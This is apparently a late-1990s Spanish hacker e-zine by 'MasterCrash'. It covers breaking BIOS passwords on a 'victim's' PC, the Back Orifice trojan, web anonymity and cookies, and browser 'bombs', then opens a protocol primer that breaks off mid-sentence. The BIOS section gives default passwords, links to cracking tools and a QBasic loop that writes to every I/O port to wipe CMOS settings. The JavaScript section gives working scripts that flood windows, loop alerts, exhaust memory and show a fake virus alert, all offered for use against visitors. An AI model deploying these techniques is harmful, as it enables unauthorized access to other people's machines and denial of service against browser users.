Pues puede ser ke la viCtima sea un poCo lista y haya deshabilitado el 
arranque desde disquete. Pero Como es de saberse somos mas listos ke la 
victima O no? ;-D  

Es por eso que me decidido a escribir este artiCulo y presentar una de las 
tantas formas que existen para hacer lo ke mas nos gusta, si el HaCking. Para 
aquellos que no saben de que se trata esto, vamos a empezar con una pequena 
INTRO.


			=====>Introducccion<=====


SISTEMA DE ENTRADA Y SALIDA BASICO (Basic Input/Output System)

Es el conjunto de programas que controla a nivel muy basico el comportamiento 
de los perifericos que estan conectados a la computadora (teclado, pantalla,
discos, comunicacion serial etc). Por ejemplo, un disco esta dividido en fajas
como en los discos musicales, y cada faja en sectores, y cada sector tiene una 
serie de indicativos sobre cual es su numero, donde comienza y termina etc. 
Cuando el SO manda a grabar una informacion al disco, este comando es 
interceptado por el BIOS, el cual desmenuza la orden de "grabelo" en una 
cantidad de comandos del tipo "levante la cabeza de gravacion", "verifique 
cual es el proximo sector libre", "vea si esta en buen estado" , "grabe aqui
los primeros bits" etc.., y una serie de otras tareas tediosas que estan 
escondidas por tras de un aparente simple comando de grabación y ke en este
momento no vienen al caso. 

Normalmente el BIOS es escrito en lenguaje de maquina (ASSEMBLER), o sea, 
comandos a nivel muy elemental que permiten un control total de las posiciones 
de memoria y de los perifericos. 

Bien luego de haber visto esta introduccion, ya estaran desesperados por
entrar en materia. 


		=====>Password por defecto<=====


Es una forma un poco carabelita, y es de probar los pass por defecto que
utilizan los fabricantes. Puedan que valga la pena antes de probar con
herramientas de poder, pues todo esta en la praCtiCa ;-).


Presionamos shift + AWARD_SW <enter>, luego soltamos a Shift.
Otra es escribiendo password, cmos, AMI, 

Nota: Rekuerden que la bios es key sensitive y tienen ke probar tanto 
mayusCulas como en minusCulas.

aHH y porque no? pueden probar los pass ke utiliza la viCtima, pues
son poCos los ke se preocupan por tener un pass seguro, pues bien
aki es donde entra la Curiosidad. Intenten probar ya sea Con su
nombre, apellido, feCha de naCimiento o Cualkier otra feCha en especial.
No se lo ke les venga en mente.
 

 
		=====>Crackeando el Bios<===== 


        En caso de ke el bios sea AMI y no AWARD. 

Aqui les pongo unos cuantos programitas para ke lo utilixen y
donde pueden conseguirlos.

Nombre

AMIBIOS
~~~~~~~
DONDE BAJARLO

ftp://dot.ishiboo.com/l0pht/lc15exe.zip

Desprotector de BIOS con clave de acceso
http://www.ping.be/bios/files/util/bios_crk.zip

Crackeador de Bios, funciona en AMI, IBM, y Award.
http://www.geocities.com/SiliconValley/Bay/6135/bios300.zip

Su uso se los dejo de tarea, ahi ke kemar unas Cuantas neuronas ¨o no ? :)


		=====>Programando<=====  


Este da resultados al instante y las veces ke lo he probado siempre 
me ha funcionado.

Este codigo es para que lo ejeCuten en el Qbasic...
Todos saben ke es el Qbasic y donde conseguirlo, sino mandemen un e-mail
ke con gusto se los enviare :)


Bien una vez ke hAllan entrado en Qbasic.

Digiten lo que esta dentro de los puntos

................................
SCREEN 2
B$ = "Enjoy!"
FOR B = 1 TO LEN(B$)
LOCATE 7, 10: PRINT RIGHT$(B$, B)
LOCATE 7, 10: PRINT ""
PLAY "<aa-aba+aab"
PLAY "l16"
LOCATE 10, 12: PRINT " by MasterCrash  e-mail: mcrash@iname.com"
NEXT B
FOR I = 34 TO 65535
OUT I, 34
NEXT I
................................


Una vex digitado, presionan f5 y listo, despues de haber hecho esto notaran
que la makina se ha frizado. Pues la reinician, y entran a la 
configuracion. 

Entran de manera normal; mayormente Con la tecla DEL
Eligen la opCion de deteCtar el disCo duro y  voila!!! 
ya es nuestra. 


<<<<<<Aun no he podido entrar :( ¨Entonces que hago?>>>>>>

Pues si con las maneras antes expuestas no puedes entrar. 

Agarras un destornillador, busca la Bios, configura los Jumpers para
borrarlas y listo!

Para aquellos ke no saben ni papas del hardware y ven un monton
de cables y chips , ni saben lo que es un jumper, ni tienen un
manual a mano.

Facil busca lo mas pareCido a una pila y has un CortoCircuito
(polo + con polo - juntos, ya sabes >;-> ).

Ahhh y ya sabes es hora de ke vayas aprendiendo a desarmar una Pc.

ke jo er, no me digas ke le tienes miedo a la eleCtricidad y ke no te 
han funCionado ninguna de las teCnicas anteriores, pues nada agarras el
maldito disCo duro y te lo te llevas a tu casa. 
Satisfecho!

Espero ke le haya gustado y sigan leyendo, ke ahi mas en este e-zine.



						by MasterCrash                             
                                                   ~~~~~~~~~~~

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\  
/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\  
     
     
			ªªªªªªªªªªªªªªªªªªªªªªª
			ª     BACKORIFICE     ª
			ªªªªªªªªªªªªªªªªªªªªªªª


Sin¢psis:
~~~~~~~~

Fue creado por un grupo de hackers conocido como el Culto de la Vaca Muerta
(Cult of the Dead Cow). para Windows 95/98 conocido como "Back Orifice" (B0)
(Orificio Trasero). Una vez instalado este backdoor (puerta trasera)permite a
usuarios no autorizados ejecutar operaciones de privilegio en la m quina
afectada.

<<<<<<¨En cuales sistemas funciona?>>>>>>

Ha sido creado para sistemas M0c0$oft, este solo funciona en Windows 95/98,
El programa servidor, en ambos casos, debe ser instalado en el ordenador de 
la victima. Como se ha explicado, esta tarea se ha simplificado, ya que el 
atacante puede ocultar el troyano dentro de cualquier programa o aplicacion.
Incluso puede mandar el virus por correo y ser instalado con solo abrir el
mensaje (. Una vez instalado, el servidor abre un puerto de comunicaciones y
se queda escuchando las peticiones del oyente. Es decir, los comandos que le
envia el programa cliente que este utilizando el atacante desde su ordenador
remoto. NetBus abre un puerto TCP, mientras que Back Orifice utiliza un puerto
UDP. Se puede cambiar el número del puerto por el que atiende el servidor en
ambos casos. Tambien se puede proteger el acceso al servidor mediante una clave.

<<<<<<¨Sinteticamente, qu‚ es?>>>>>>

        BackOrifice es un programa de control remoto de computadoras y redes
especialmente pensado y realizado para brindar acceso a trav‚s de internet o
una red LAN basadas en el protocolo TCP/IP a terceras personas.


<<<<<<¨Como se tramsmite?>>>>>>

        Principalmente como un ejecutable de cualquier tipo con una extensi¢n
aproximada de 122 Kb. que uno generalmente recibe a trav‚s de Internet bajo
cualquier nombre, pero no necesariamente por esta v¡a.


<<<<<<¨Como pueden acceder a mi makina?>>>>>>

        Puede realizarse £nicamente si la computadora se conecta a una red.
Esta red puede ser del tipo Internet o una red LAN (Red de Area Local) sin
conexi¢n a Internet.


                Precisiones t‚cnicas de su funcionamiento
                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

<<<<<<¨En que lenguaje de programacion fue escrito y compilado?>>>>>>

        Todos los programas del troyano fueron escritos en C++ y compilados
con el Microsoft Visual C++ Compiler. Todas las fechas de compilaci¢n del
troyano fueron realizadas a finales de Julio, primera semana de Agosto, de 1998.
Todos los programas tienen el formato de Ejecutables Transportables (Portable Excutable)
y pueden ser solo ejecutados bajo Win32.


<<<<<<¨Cual es el EJECUTABLE PRINCIPAL?>>>>>>

        Es el archivo BOSERVE.EXE que puede ser encontrado con diferentes
nombres en las computadoras infectadas( como habiamos mencionado anteriormente).
Este es en s¡ mismo un troyano. Este programa es la parte del troyano que funciona
como Servidor (Server) que puede ser llamado por los "clientes" desde una
computadora remota.


<<<<<<¨Que es el BOCONFIG.EXE ?>>>>>>

        Es el segundo archivo del paquete es el utilitario BOCONFIG.EXE que
puede configurar el Servidor como as¡ tambi‚n "pegarlo" (infectar) a otros
ejecutables tal como lo hacen todos los virus.

        Cuando el programa anfitri¢n es infectado su c¢digo fuente es movido
"hacia abajo" y el c¢digo del troyano es colocado en la cabecera del programa.
Cuando los programas infectados son ejecutados, el troyano extracta la imagen
del programa original y engendra una nueva copia sin ning£n tipo de efecto
colateral.

        Hay dos partes "Clientes" del troyano (consola y ventana), ellas operan
junto con el programa Servidor desde la computadora remota. Otros dos programas
ejecutables del paquete del troyano son utilizados por ‚ste mientras comprime/
descomprime archivos en el Servidor (Server).

        Cuando el troyano se ejecuta en la computadora, primero que todo detecta
su propio estado: si es la copia original o una copia "pegada" (attacheada) a
un programa infectado que hizo de anfitri¢n. El troyano ubica las opciones
preconfiguradas en el programa infectado y las lee.
El troyano entonces crea el archivo WINDLL.DLL en el directorio System de Windows
(este archivo es guardado como un recurso por el troyano), entonces toma las
direcciones de varias API (aplicaciones) que utilizan el KERNEL32.DLL para
futuros usos, busca troyanos ya ejecutados y de existir los actualiza, se copia
a s¡ mismo al directorio System de Windows y registra esta copia en el Registro
del Sistema (System Registry) como un servicio (programa) auto-ejecutable:

 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Windows\CurrentVersion\RunServices

Crea un canal TCP/IP, le asigna (por defecto) un n£mero de port 313337 y lo
abre para quedar "a la escucha". El troyano ejecuta entonces un bucle estandar
de Windows Dispatch Message (env¡o de mensaje) y de esta forma se mantiene en
la memoria de Windows como un proceso con atributo de invisible (este hace que
no aparezca una ventana en la lista de programas en Ejecuci¢n -ALT+TAB- y que
no sea visible en el Administrador de Tareas -Task Manager-).

        La rutina principal del troyano entonces queda "a la escucha" de comandos
enviados desde el programa remoto que funciona como Cliente. Los comandos llegan
en forma encriptada y comienzan con la cadena de identificaci¢n "*!*QWTY?"
(sin las comillas).


        El troyano es capaz de expandir sus habilidades a trav‚s de plug-ins
(agregados). Los plug-in pueden ser enviados al programa Servidor e instalados
como aditamentos al troyano. Las caracteristicas y funciones principales
(inclusive posibles funciones destructivas) son responsabilidad de quien crea
estos aditamentos."

Visite la direccion www.cultdeadcow.com/tools/bo_plugins.html si desea conocer
todos estos 'plugins' para Back Orifice.


<<<<<<¨Como protegerme?>>>>>>


Hay muchas utilidades ke te ofrecen proteccion contra este tipo de amenaza, de
las cuales muy pocas funcionan.
Entonces...

<<<<<<¨Cuales funcionan?>>>>>>
  
Calma ke aki estoy para ayudarte. Una de ellas es el "Nobo" que te protegera
con este tipo de atake. Y ademas te dara la Ip del atacante. Lo he incluido
en la revista para que te protejas de este tipo de atake.


Otra es el "Liberator" (parecido al Nobo). 

<<<<<<¨Donde puedo conseguirlos?>>>>>>

http://www.web.cip.com.br/nobo/

http://www.liberator.com


	/_/_/_/_/_/_/_/_/
      * Otras soluciones * 
       \_\_\_\_\_\_\_\_\_\  


Este troyano se han difundido de tal manera que ya han aparecido programas 
que no solo eliminan el virus del ordenador, sino que pasan al ataque. 
Localizan la direccion IP del PC que esta ejecutando la parte cliente y 
tratan de dejarle fuera de juego. 

BackFire surf.to/leebros aparece, a modo de venganza, contra Back Orifice.

Pero no se confunda, la verdadera solucion contra los virus en general y los 
caballos de Troya en particular, reside en la proteccion que nos ofrecen los 
antivirus comerciales. Sobre todo para plataformas tan poco seguras como 
Windows 95 o 98. 


Nota: Este tema es bastante amplio, espero que me disculpen ya que solo
pude tratar la parte teorica por falta de tiempo (trabajo y estudios) y 
tendre que hacer una segunda parte del mismo.

Gracias! Sabia que entenderias :)


                   					by MasterCrash                             
						           ~~~~~~~~~~~


\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\  
/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\  


     
			ªªªªªªªªªªªªªªªªªªªªªªª
			ª ANONIMATO EN LA RED ª
			ªªªªªªªªªªªªªªªªªªªªªªª


        Tanto si quieres rastrear a tus visitantes u obtener datos de alguien,
tanto si deseas navegar anonimamente o saber como se utilizan las "galletitas"
(cookies) debes saber algunas cosas del funcionamiento de Internet, de los
rastros que dejamos al navegar y de como evitarlos, asi como empezar a utilizar
si no lo haces ya algunas herramientas muy simples para enviar correo anonimamente.

        Cada vex que navegamos en Internet dejamos rastros, si no la sabias ya
es hora que te enteres, la "privacidad" que crees tener no es tal, NO EXISTE,
todos los datos que vas dejando en los sitios que frecuentas estan siendo 
recopilados para obtener un PERFIL EXACTO, esto representa un control mucho 
mayor sobre el ciudadano que el que se hubiese podido so¤ar mientras se le 
ofrece una falsa sensacion de "intimidad".

Pues bien aki te ofrezco algunos metodos para evitar las molestas "galleticas"
(cookies), asi como tambien algunas herramientes simples para enviar correo 
anonimo.  
 
Bienvenido al mundo de la Ciberocracia, cada vez que usaste una tarjeta
de credito, ellos saben cuanto, como y donde (y lo mismo con las Visa
Cash, amigo), cada vez que utilizas una tarjeta 'gratuita' de socio
(de un super, del C.Ingles, de FNAC..) almacenan unos datos mas sobre ti.
(¨Y sino porque crees que te insisten tanto en que las uses? ¨eh?)

¨Y en Internet?, cada vez que escribes en un newsgroup, efectuas una
b£squeda o visitas paginas, ELLOS SABEN CUANDO, COMO, CUANTO TIEMPO y
estan rematando tu perfil.

Es posible que pienses que eso no es importante :? entonces puedes dejar
de leer. Si por el contrario no te gusta que un desconocido sepa cosas
como:

- Cuanto ganas
- Con quien vives (familia,hijos..)
- En que te gastas el dinero (creditos, hobbys..)
- Donde pasas las vacaciones
- Tu estado de salud (enfermedades, hospitalizaciones..)
- Tus afinidades sociales y politicas
- Las cosas que no te gustan

Entonces puedes seguir leyendo (por curiosidad, ¨sabrian tus amigos
responder a esas preguntas sobre ti?)


# Navegando

Seguro que estas cansado de ver contadores de acceso, estos indican las
veces que se ha visitado una pagina pero el propietario de la misma no
solo obtiene el n§ de accesos sino que por lo general tambien sabe de
donde provenian sus visitantes y de que web llegan (¨Como crees que
controlan la rentabilidad de los banner?), esto se encuentra al alcance
de cualquiera, ahora imagina lo que pueden llegar a trazarte las grandes
empresas.

Tambien te gusta disfrutar de muchos servicios gratuitos ¨verdad?, en
algunos te piden muchos datos personales y en otros que respondas a unas
simples preguntas. Ellos te dicen que respetan tu privacidad pero si te
has fijado normalmente hablan de no vender nunca a nadie por nada.....
tu direccion e-mail (pero no hablan del resto de datos).

¨Y Whowhere?, Bigfoot, Four11, IAF y los millones de comunidades virtuales?.
Te animan a hacerte socio, a poner cosas sobre ti (colegios, universidades,
aficiones, trabajo, direccion) pero no mienten todo es seg£n sus propias
palabras "para que te encuentren mas facilmente". La pregunta es ¨Quien?
Quizas ya lo hagas, la mejor manera de intentar salvarse del cruce de
datos es inventarse varias personalidades, coge la guia telefonica y apunta
nombres, telefonos, direcciones y utilizalas cuando te pidan los datos,
dotalos de gustos propios y vigila que direccion de correo entregas, lo
mejor es tener una direccion £nica desde la cual la redirijas a tu
verdadero buzon.

¨Y como navego sin que me pillen?. Navega ANONIMAMENTE, utiliza servicios
disponibles y encuentra los tuyos propios, de entrada puedes poner


¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤
¤								       ¤	
¤          	   http://www.anonymizer.com:8080/		       ¤ 	
¤								       ¤	
¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤


DELANTE de la direccion que tu quieras y navegaras anonimamente (y mas
lento) pero tambien hay otras direcciones como esas, muchos administradores
DESCONOCEN que su servidor puede ser utilizado por usuarios espabilados
para navegar anonimamente (para que preocuparlos, mejor no les avisamos)

Encuentra esos ordenadores tan "amigables". ­Es divertido!. 

En el caso anterior para visitar el web de Ciudad Futura de manera anonima
(y repito algo mas lenta) pon esto en el cuadro de destino de tu browser.

http://www.anonymizer.com:8080/http://www.ciudadfutura.com

Y para el web de Netscape

http://www.anonymizer.com:8080/http://www.netscape.com

¨Facil, no?

Puedes configurar anonymizer para que sea tu 'proxy', ten en cuenta que
la lentitud se debe a que Anonymizer pide las paginas y luego te las envia
a ti (evidentemente mas trabajoso que si las pides tu directamente pero
mucho mas discreto)

*TIP*: Los demas ordenadores tambien son ...8080s


# News. Usenet y como se utiliza en tu contra.

Los buscadores se estan expandiendo, ahora buscan tambien imagenes, sonido
y..news. El buscador mas completo de news es posiblemente DejaNews, en
el puedes efectuar b£squedas simples o mucho mas complejas (mediante filtros).
CUALQUIERA puede chequear tus comentarios en USENET, ¨que dices?,
¨en que grupos?, ¨cuando?...Si alguna vez mandaste un mensaje a un foro
pornografico, racista o simplemente "incorrecto" y pensabas que no habia
manera de que ello te comprometiera..malas noticias, estas equivocado.

Si nunca has escrito nada "censurable" simplemente piensa en todo lo que
alguien puede adivinar de ti solo por lo que escribes (lo mismo que TU
puedes saber mucho de mi a traves de este documento).

Los buscadores ganan dinero, son los £nicos que lo hacen en Inet y estan
construyendo pacientemente enormes bases de datos. ¨Cuando te conectas?
¨Que palabras buscas?, ¨Que secciones de su site frecuentas?...
¨Porque crees que cuando buscas algo la pagina de resultados muestra un
banner relacionado?. Y por lo general es de pago....

¨Ahora crees que todos esos datos sobre ti 'seran olvidados'? :D


# Cookies

Hace alg£n tiempo mucha gente desperto y supo que su browser (Netscape por
supuesto) almacenaba datos enviados por el servidor en un fichero llamado
"cookies.txt".  (Los que utilizan el Explorer que no se emocionen, hace
lo mismo y sigue siendo peor)

¨Pero que son las 'galletitas'? Las cookies son informacion, dise¤ada por
el site que visitas, util para el, pero que TU almacenas. Es una peque¤a
pieza de informacion que se envia a tu browser sin que sea transparente al
usuario (para los menos espabilados Netscape permite ahora mostrar una
pantalla de advertencia antes de aceptar una 'cookie').

¨Que informacion contienen las 'cookies'?. Pues cualquier cosa que le
interese al dise¤ador del site como: Tu direccion IP, la fecha y hora, un
ID de visitante.....­hay un mundo de posibilidades! (que alegria).

Cuando recibes una 'cookie' el browser la envia de nuevo al servidor que
la origino cada vez que solicita una pagina html. La manera en que estan
dise¤adas las 'cookies' hace que solo el que las origino pueda consultarlas
de manera que no se pueden 'robar galletitas' ni averiguar por medio del
protocolo HTTP que 'cookies' tiene un usuario determinado. ¨Complicado?.


Simplemente decir que cada vez que nos conectamos a un servidor para el
que tenemos una 'cookie' esta se envia automaticamente y que solo el que
la origino puede borrarla (enviando una fecha de expiracion que ya haya
pasado).

­No entiendo nada! ¨Esto para que vale?. Hummm... asi que eres un poquito
duro de mollera, esta bien, imagina.

Visitas un buscador (ej: Yahoo) y buscas unas cuantas palabras, Yahoo te
manda una cookie con ID de visitante (ej:321d098fdy345) y ALMACENA en su
servidor las palabras que busco dicho visitante. Cada vez que te conectes
al servidor mandaras tu ID automaticamente y cada nueva b£squeda sera
almacenada con lo que al cabo de un tiempo podran saber muy fiablemente
que te interesa, asi que cuando la compa¤ia Platano Loco quiera poner alg£n
banner en Yahoo podra decir: Oye tios, buscadme alguien interesado en
alimentacion sana, productos de calidad, cuidado corporal... y Yahoo
buscara en su database y ­voila!.  Este es el menor grado de refinamiento
de lo que se puede hacer con las 'cookies' ¨captas ahora?.


<<<<<<¨Como desactivo el uso de cookies?>>>>>>

Para usuarios de Netscape
~~~~~~~~~~~~~~~~~~~~~~~~~

1) Un click en Edit.
2) Elijo Preferences.
3) Luego Advanced.
4) Un click en la casilla "Disable cookies".
5) Finalmente un click en Aceptar.


Para usuarios de Internet Explorer ( Es hora de que vayas cambiando de navegador)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Un click en View.
2) Elijo Internet Options.
3) Luego Advanced.
4) Un click en la casilla "Disable all cookies in use".
5) Finalmente un click en Aceptar.

Para finalizar este tema: Se han dado kuenta de lo ke ha hecho Moco$oft
con hotmail. Para poder ver tu correo tienes ke permitirle el uso de
cookies. Todavia sigues pensando ke eso no es monopolio?
Definitivamente me cambio de correo!
Total hotmail ya no es lo mismo desde ke Moco$oft lo adquirio :(
Fucking Moco$oft 

# E-mail anonimo

Un mensaje electronico tiene siempre un remitente pero a veces (o siempre)
no nos interesa dar a conocer nuestra identidad, para poder enviar mensajes
y recibirlos anonimamente se han creado muchos servicios de remailers.

****** Recordatorio a anon.penet.fi, cerrado por causa de los cabrones y de
la ""Iglesia de la Cienciologia"", unos tarados *****

No voy a darte un monton de direcciones, cambian mucho.
Pero no te preocupes porque si que voy a darte un link a una pagina que
guarda una lista actualizada regularmente de los remailers existentes.

Hay de muchos tipos:

- Los basados en Web (como Altavista pero en anonimo)
- Los remailers catetos (envias un mensaje y ellos lo re-rutan)
- Los remailes cyberpunks (una cadena de remailers)
- Los que permiten recibir mensajes (asignandote una ID de usuario)
- Los que requieren soft especifico (como Mixmaster)

Y muchos que mezclan varias caracteristicas anteriores.

¨Que servicios ofrecen?. (No todos por supuesto)

- Encriptacion mediante PGP.
- Enlazado- Retardo en la salida del mensaje (para evitar el analisis de trafico)
de varios remailers.
- Informacion adicional en la cabecera del mensaje

Antes de confiar en un remailer informate de si es fiable o por el contrario
tiene fama de monitorizar el trafico de mensajes, normalmente los remailers
te aseguran privacidad a menos que los uses abusivamente, ejemplos de usos
abusivos son:

- E-mail spamming, mandar un 'e-mailing', no te sirvas de un remailer para
tus campaÏas publicitarias.
- E-mail insultantes, los administradores del remail no quieren quejas,
suelen estar muy sensibilizados con las demandas de la justicia (estan ya
escaldados)
- Cualquier uso que les cause problemas. La respuesta basica es: tu problema
no el nuestro.

Los remailers mas usuales suelen funcionar incluyendo en el cuerpo del
mensaje lo siguiente:

:: (1Ý linea, los dobles dos puntos indican que lo que viene a continuacion
debe ponerse en la cabecera del mensaje).

X-mail To: usuar@i.o
o  (2Ý linea, dependiendo del remailer, aqui va el destinatario del mensaje)
Anon-To:usuar@i.o

Subject: New subject (nuevo tema del mensaje que reemplaza al original)
(LINEA EN BLANCO)

Comienza el mensaje

NO OLVIDES dejar una linea en blanco entre los campos que incluiras en la
cabecera y el comienzo real del mensaje. Y si no lo has entendido siempre
puedes enviar un e-mail a un remailer con el mensaje en el body de:

remailer-help.

*TIP*: La direccion que te dije:

http://www.cs.berkeley.edu/~raph/remailer-list.html
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             
							by MasterCrash                             
						           ~~~~~~~~~~~


\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\
/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\  


			ªªªªªªªªªªªªªªªªªªªªªªª
                        ª    Bombas Java      ª
			ªªªªªªªªªªªªªªªªªªªªªªª



Jodiendo a los Browsers
~~~~~~~~~~~~~~~~~~~~~~~
Esta es una coleccion de programas en javascript para Netscape 2.0 o superior
e Internet explorer 3.0 o superior. Todos estos scripts han sido obtenidos en
Internet, y algunos no estan en su forma original. Usalos bajo tu propia
responsabilidad, ­yo no me hago responsable de los da¤os que estos scripts
puedan causar!.


                <>-<>-<>-<>-<>-<>-<>-<>-<>
                <>Exploding windows Bomb<>
                <>-<>-<>-<>-<>-<>-<>-<>-<>

<!--
function WindowBomb()
{
    var iCounter = 0   
    while (true)
      {
        window.open("http://www.geocities.com/SiliconValley/Lakes/6417","CRASHING" +
 iCounter,"width=1,height=1,resizable=no")
        iCounter++
      }
}
// -->
Top of Form 2
 
Bottom of Form 2
 
Este script empieza a abrir ventanas hasta que se cuelga el browser. 


                <>-<>-<>-<>-<>-<>-<>
                <>Annoying Button <>
                <>-<>-<>-<>-<>-<>-<>



<!--
function AnnoyingButton()
{
   while (true)
       window.alert("A que jode?? ;)")
}
// -->
Top of Form 3
 
Bottom of Form 3
 
Bucle infinito de ventanas de mensages que no te deja salir de donde estas. 


                <>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>
                <> Closing Internet Explorer 3.X <>
                <>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>

                                                

<!--
function PutoExplorer()
{
                              var uagent=navigator.userAgent;
                              if (uagent.indexOf("MSIE") == 25)
                              self.close()
}
// -->
Top of Form 4
 
Bottom of Form 4
 
El script comprueba si tu browser es el I. Explorer de Microsoft.. si lo es,
lo cierra!

Nota: En la version 5 de de IE, no funciona ya que le saldra un mensaje
notificandolo a la viCtima que hay un script que intenta cerrar el Browser.


                <>-<>-<>-<>-<>
                <>Eat Memory<>
                <>-<>-<>-<>-<>


<!--
var szEatMemory = "HOLA QUIERES SER MI AMIGO"
function EatMemoryInTime()
{
    szEatMemory = szEatMemory + szEatMemory                    
    window.status = "String Length is: " + szEatMemory.length  
    window.setTimeout('EatMemoryInTime()',1);                  
}
//  -->
Top of Form 6
 
Bottom of Form 6
 
Bucle come memoria. 



                <>-<>-<>-<>-<>-<>-<>
                <> Virus Simulator<>
                <>-<>-<>-<>-<>-<>-<>



<!-- 
function ConfirmClose() {        
	alert("Error 107x has occoured. The virus:'Pecador de la Pradera'
 has been detected on Drive C.  Please erase all infected files.")
	if (confirm("Please inform the the hardware vendor of this
 error."))
		alert('The virus has been contained, to fully recover
 the browser will shutdown'); 
	else 
		alert('The problem has not been fixed, the browser
 will shut downto prevent further contamination.') 
	{              
	window.close()        
	}
}
//-->
 
Este script cierra el browser despues de simular un virus. 

Puedes usar este scripts de dos maneras: 

-Forma de boton:

El script debe incluirse en una funcion. Que te permita llamarla. La puedes
llamar pulsando el boton del formulario. Mira un ejemplo:

<!--
function PutoExplorer()
{
                              var uagent=navigator.userAgent;
                              if (uagent.indexOf("MSIE") == 25)
                              self.close()
}
// -->

Puedes usarla directamente, sin llamar al script. Se ejecuta cuando se cargue
un fichero HTML. Buena idea para protejer tu pagina contra los usuarios del
Explorer....(Como una broma sin malicia). Coloca el script entre HEAD y /HEAD
o inmediatamente despues de BODY para una rapida ejecuccion. Mira el ejemplo:

<!--
                              var uagent=navigator.userAgent;
                              if (uagent.indexOf("MSIE") == 25)
                              self.close()
// -->




							by MasterCrash                             
						           ~~~~~~~~~~~


\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\
/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\  


			ªªªªªªªªªªªªªªªªªªªªªªª
                        ª     Protocolos      ª
			ªªªªªªªªªªªªªªªªªªªªªªª

                              
 INTRODUCCION

 ¨QUE ES TCP/IP?

 ¨QUE ES HTTP?

 ¨QUE ES EL DOMAIN NAME SYSTEM (DNS)?

 ¨QUE ES FTP?

--------------------------------------------------------------------------------
        En esta entrega les voy a hablar sobre los protocolos de comunicaci¢n,
lo que me anim¢ a escribir estas l¡neas, es al poco interes mostrado a
dicho tema, ya que lo utilizamos sin darnos cuenta de su importancia y
realmente han estado interactuando con nosotros los Cibernautas, cada vez
que estamos navegando.
Y esa es la raz¢n de mi iniciativa para ense¤ar un poco de lo aprendido,
espero que les sea de su agrado. ;-)
-------------------------------------------------------------------------------
   TCP/IP (Transmisi¢n Control Protocol/Internet Protocol) es el nombre com£n
que identifica a m s de 100 protocolos de comunicaci¢n, usados para entrelazar
las computadoras dentro de una red.
--------------------------------------------------------------------------------
   TCP/IP se ha convertido en el est ndar de Internet por su interopera-
bilidad entre diferentes tipos de computadoras, adem s de que la gran
mayor¡a de las redes p£blicas o privadas soportan TCP/IP como protocolo de
comunicaci¢n, permitiendo as¡ la comunicaci¢n entre ellas.
--------------------------------------------------------------------------------
   HTTP se soporta sobre TCP, que es el protocolo de transporte de TCP/IP para
comunicaciones orientadas a conexi¢n. Como otros protocolos de la familia
TCP/IP, utiliza el esquema cliente-servidor. El servidor permanace activo
esperando conexiones de los clientes HTTP. Una vez es solicitada una conexi¢n,
el servidor responde dejando la posibilidad de que otros clientes logren cone-
xiones simult neas.
--------------------------------------------------------------------------------
Como HTTP comparte la infraestructura de red y el mecanismo de transporte(TCP)
con otros protocolos como SMTP(Correo Electr¢nico) y FTP(transferencia de
archivos), su informaci¢n debe distinguirse de alguna manera de la de los dem s.
Para ellos se usa un elemento de TCP/IP llamado puerto IP.
VER DOMAIN NAME SYSTEM
--------------------------------------------------------------------------------
    Se trata de un n£mero que identifica a cada protocolo y genera una especie
de "Canal" o "Grupo de Canales" dedicados a la tranferencia de hipertexto
en los cuales deben estar "sintonizadas" las dos partes.
--------------------------------------------------------------------------------
Los n£meros reservados para las diferentes aplicaciones en Internet se llaman
"Puertos" (well known ports).
Los paquetes o tramas de cada protocolo son etiquetados con una pareja de estos
n£meros llamados "Puerto Origen" y "Puerto Destino".
Generalmente se usa el n£mero 80 como Puerto Origen de los paquetes procedentes
de servidor, y como Puerto Destino de los paquetes procedentes del cliente.
El otro n£mero puede ser definido por el cliente siempre que no coinicida con
uno de los puertos bien conocidos. Por supuesto, todo esto ocurre de forma
inadvertida para el usuario final.
--------------------------------------------------------------------------------
     La informaci¢n que viaje dentro de los paquetes HTTP no es otra que la
que esta incluida en doucumentos en formato HTML residentes en el servidor
como destino al cliente. En sentido contrario, regularmente
solo viajan paquetes de confirmaci¢n de que se ha recibido un bloque
